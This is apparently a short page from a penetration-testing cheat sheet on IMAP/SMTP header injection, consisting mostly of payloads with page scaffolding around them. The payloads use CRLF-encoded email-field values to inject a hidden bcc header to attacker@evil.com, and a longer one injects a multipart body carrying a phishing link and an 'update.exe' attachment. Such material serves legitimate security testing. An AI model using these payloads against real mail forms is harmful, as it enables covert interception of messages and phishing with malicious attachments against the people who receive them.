IMAP SMTP Injection
Check List
Methodology
Black Box
Email field
1
2
3
4
email=gupta@gmail.com%0d%0abcc:attacker@evil.com5
6
Reflected In The Confirmation Email or Response
1
2
3
4
email=victim@company.com%0d%0abcc:attacker@evil.com5
6
email=victim@company.com%0d%0a
content-type:multipart/mixed; boundary="XYZ"%0d%0a
%0d%0a--XYZ%0d%0a
content-type:text/plain%0d%0a
Your account needs verification: https://evil.com%0d%0a
--XYZ%0d%0a
content-type:application/octet-stream; name="update.exe"%0d%0a
content-disposition:attachment; filename="update.exe"%0d%0a
[base64-encoded payload or dummy data]%0d%0a
--XYZ--White Box
Cheat Sheet
Last updated